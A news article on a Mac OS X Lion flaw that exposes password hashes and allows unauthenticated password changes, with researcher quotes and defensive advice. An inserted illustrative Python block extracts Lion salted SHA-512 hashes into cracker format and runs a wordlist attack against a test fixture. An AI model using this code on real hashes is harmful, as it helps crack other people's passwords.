
Mac OS X Lion flaw could see hackers changing passwords

Password hash can be seen by non-privileged users

A flaw in Apple's Mac OS X Lion could allow hackers to change passwords, say security researchers.

According to the Defense in Depth blog, the operating system stores password hashes in shadow files, which can only be accessed by a high-privilege user such as an administrator. However, unlike previous versions of Mac OS X, Lion lets non-privileged users view password hashes through Directory Services. Hackers could also skip the hash entirely and change a password outright, since "Directory Services in Lion no longer requires authentication when requesting a password change for the current user".

"Due to Lion's relatively short time on the market, I am yet to find any of the major crackers supporting OS X Lion hashes," said Patrick Dunstan on the blog, adding that hackers don't need to "crack hashes when you can just change the password directly!"

"Whilst the ability to change the currently active user's password is not a privilege escalation flaw per se, it can under some circumstances be used for these purposes."
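As an added illustration (not code from the article or from Dunstan's blog), the following Python shows what a Lion password hash looks like once it has been read out of Directory Services, and why "crack hashes" is only the slower of the two paths: Lion's ShadowHashData attribute is a binary plist whose SALTED-SHA512 entry is a 4-byte salt followed by SHA-512(salt || password), so checking a candidate is a single hash call and the 136-hex-character line it yields is exactly what a salted-SHA-512 cracker consumes. The hex-dump layout, the fixture password and the fixed salt are constructed for the example and are assumptions, not values from the page.

```python
import hashlib
import hmac
import os
import plistlib
from typing import Iterable, Optional, Tuple

# Lion (10.7) keeps each user's hash in the ShadowHashData attribute as a binary
# plist; its "SALTED-SHA512" entry is 68 bytes: 4-byte salt || SHA-512(salt || password).
SALT_LEN = 4
DIGEST_LEN = hashlib.sha512().digest_size  # 64
HASH_KEY = "SALTED-SHA512"


def make_shadow_hash_data(password: str, salt: Optional[bytes] = None) -> bytes:
    """Build a Lion-style ShadowHashData plist for a known password (test fixture only)."""
    salt = os.urandom(SALT_LEN) if salt is None else salt
    if len(salt) != SALT_LEN:
        raise ValueError("Lion salts are 4 bytes")
    digest = hashlib.sha512(salt + password.encode("utf-8")).digest()
    return plistlib.dumps({HASH_KEY: salt + digest}, fmt=plistlib.FMT_BINARY)


def decode_hex_dump(text: str) -> bytes:
    """Turn a whitespace-separated hex dump of the attribute (layout assumed for
    this example) back into the raw plist bytes."""
    return bytes.fromhex("".join(text.split()))


def parse_shadow_hash_data(blob: bytes) -> Tuple[bytes, bytes]:
    """Return (salt, digest) from a ShadowHashData plist; reject any other hash type."""
    plist = plistlib.loads(blob)
    if HASH_KEY not in plist:
        raise ValueError(f"no {HASH_KEY} entry; keys present: {sorted(plist)}")
    data = plist[HASH_KEY]
    if len(data) != SALT_LEN + DIGEST_LEN:
        raise ValueError(f"expected {SALT_LEN + DIGEST_LEN} bytes, got {len(data)}")
    return data[:SALT_LEN], data[SALT_LEN:]


def to_cracker_line(blob: bytes) -> str:
    """salt || digest as 136 hex chars, the input form for a sha512($salt.$pass) cracker."""
    salt, digest = parse_shadow_hash_data(blob)
    return (salt + digest).hex()


def check_candidate(blob: bytes, candidate: str) -> bool:
    """Verify a single password guess against the stored salt and digest."""
    salt, digest = parse_shadow_hash_data(blob)
    guess = hashlib.sha512(salt + candidate.encode("utf-8")).digest()
    return hmac.compare_digest(guess, digest)


def wordlist_attack(blob: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first wordlist entry whose salted SHA-512 matches, or None."""
    salt, digest = parse_shadow_hash_data(blob)
    for word in wordlist:
        if hashlib.sha512(salt + word.encode("utf-8")).digest() == digest:
            return word
    return None


if __name__ == "__main__":
    # Constructed fixture: a hash for a known password under a fixed salt, rendered
    # as the kind of hex dump an attacker would have copied out of Directory Services.
    fixture = make_shadow_hash_data("hunter2", salt=bytes.fromhex("deadbeef"))
    hexed = fixture.hex()
    dump = " ".join(hexed[i:i + 8] for i in range(0, len(hexed), 8))
    blob = decode_hex_dump(dump)
    print("cracker line:", to_cracker_line(blob))
    print("recovered:", wordlist_attack(blob, ["password", "letmein", "hunter2"]))
```

The parser refuses anything that is not the 68-byte SALTED-SHA512 layout, so a later hash type (a different key or length in the plist) fails loudly rather than being fed to the wrong cracking mode. The point of the example is the asymmetry the article describes: even with a fast, single-round salted hash, a wordlist run is still work, whereas the unauthenticated password change needs none.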

According to Chester Wisniewski of security firm Sophos (www.sophos.co.uk), the flaw is particularly dangerous for those using Apple's new FileVault 2 disk encryption, since the changed login password is also the credential that unlocks the encrypted disk.

"If your Mac were left unlocked and someone changed your password, you would no longer be able to boot your computer and potentially would lose access to all of your data," he said in a blog post.

Wisniewski advised those affected to disable automatic login and never leave a machine logged in and unattended. Lion users should also lock the screen with the Keychain menu-bar lock when stepping away, and enable the screensaver with the option that prompts for a password on wake.
